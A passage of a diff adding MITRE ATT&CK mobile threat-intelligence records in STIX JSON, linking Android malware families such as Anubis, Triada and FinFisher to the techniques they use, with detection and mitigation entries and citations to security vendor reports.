Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.572Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) tracks the latitude and longitude coordinates of the infected device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c78a3e66-b7aa-4feb-bc18-b8af77f27a47", + "created": "2023-03-20T15:20:11.652Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:20:11.652Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4454a696-7619-40ee-971b-cbf646e4ee61", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to send messages to premium SMS messages.(Citation: Lookout-EnterpriseApps)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e29d91f0-ebee-481d-9344-702c90775109", + "type": "relationship", + "created": "2020-05-07T15:33:32.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." 
+ } + ], + "modified": "2020-05-07T15:33:32.928Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) can inject fraudulent ad modules into existing applications on a device.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fcfc36b-bebc-481f-b9af-b65008b045ec", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BankInfoSecurity-BackDoor", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017." + }, + { + "source_name": "NYTimes-BackDoor", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Adups](https://attack.mitre.org/software/S0309) was pre-installed on Android devices from some vendors.(Citation: NYTimes-BackDoor)(Citation: BankInfoSecurity-BackDoor)", + "modified": "2022-04-19T15:46:20.166Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5b235ed4-548d-49f2-ae01-1874666e6747", + "created": "2022-03-30T19:51:56.543Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:51:56.543Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc7ef843-a073-4e23-b717-c505d4863b02", + "created": "2023-03-20T18:53:58.856Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:58.856Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", 
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cbf17fea-141e-44b8-831c-b3cc41066420", + "type": "relationship", + "created": "2021-01-20T16:01:19.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." + } + ], + "modified": "2021-01-20T16:01:19.409Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can download attacker-specified APK files.(Citation: Trend Micro Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1cca5e17-80ae-4b6e-8919-2768153aa966", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Xbot](https://attack.mitre.org/software/S0298) uses phishing pages mimicking Google Play's payment interface as well as bank login pages.(Citation: PaloAlto-Xbot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--16955c8e-65ab-4c9a-a8b1-bec4d5a45f8d", + "type": "relationship", + "created": "2021-10-01T14:42:48.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-12T13:51:41.045Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect images stored on the device and browser history.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e2d1ffa-f6df-4d3c-b99b-f7b8baff53e8", + "type": "relationship", + "created": "2019-09-04T15:38:56.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." 
+ } + ], + "modified": "2019-09-10T14:59:26.171Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can take screenshots of other applications.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03ff6271-d7bc-40f3-b83d-25c541333694", + "type": "relationship", + "created": "2019-11-19T17:32:20.701Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-12-26T16:14:33.468Z", + "description": "If a user sees a persistent notification they do not recognize, they should uninstall the source application and look for other unwanted applications or anomalies.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--52649ab6-8d1c-41d0-9804-3fd4b6a1ba48", + "created": "2023-03-16T18:37:55.715Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:37:55.715Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--290c9d3f-f59b-4e2b-9b7b-115014845c15", + "type": "relationship", + "created": "2021-09-24T14:47:34.447Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-04T20:08:48.439Z", + "description": "Device attestation can often detect rooted devices.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--476e269e-3c49-4fda-a54b-3f0cb577c5af", + "created": "2020-12-14T14:52:03.322Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:58.974Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can collect the device’s contact list.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6de29595-e63e-4d7e-992f-b4622b7b8e23", + "type": "relationship", + "created": "2020-09-11T14:54:16.566Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.566Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect device metadata and can check if the device is rooted.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb2a14c1-bed9-4c3f-a60b-8df384c18b68", + "type": "relationship", + "created": "2020-12-24T21:45:56.979Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-04-19T14:29:46.650Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can retrieve files from external storage and can collect browser data.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ba02a1dc-d5b9-41cb-9adf-883119e1aa51", + "created": "2020-12-14T14:52:03.359Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:27.624Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has communicated with the C2 using HTTP.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea", + "created": "2023-02-06T19:45:58.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + 
"description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:08:45.192Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can use the open-source project RetroFit for C2 communication.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a255d63-a770-4b9d-911c-bd906733ceef", + "created": "2023-01-18T19:24:36.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:05:42.846Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has C2 commands that can move the malware in and out of the foreground. 
(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67db22d4-6f89-40c6-b31b-737c1e3dec3f", + "created": "2021-01-20T16:01:19.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021.", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:17:07.374Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) has used motion sensor data to attempt to determine if it is running in an emulator.(Citation: Trend Micro Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0efe4125-504f-4eea-b19f-a44c81ee31dd", + "created": "2021-01-05T20:16:20.488Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": 
"https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can launch a fake Facebook login page.(Citation: Zscaler TikTok Spyware)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e78b2cd9-ef73-45d9-9477-e2e95454e208", + "type": "relationship", + "created": "2020-07-20T13:27:33.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.537Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can receive system notifications.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f52e1ab-284e-4d0c-bae1-3a8544a22f57", + "created": "2020-11-24T17:55:12.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:22:41.797Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can wipe the device.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b56528f-cf04-4d81-80ee-7bacb862383a", + "created": "2023-03-20T18:57:33.693Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:33.693Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + 
"target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3ca284e7-062c-4f23-b95d-9f9c6a2d882a", + "created": "2019-07-16T14:33:12.175Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:35.330Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) variants capture transaction data from SMS-based in-app purchases.(Citation: Kaspersky Triada March 2016) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f7b7de2-10e8-4eec-9c8f-db44ac3f271b", + "created": "2020-04-08T15:51:25.128Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:36.827Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can collect SMS messages.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--833b4c44-7370-4b27-b9b2-a058c27dcf8c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. 
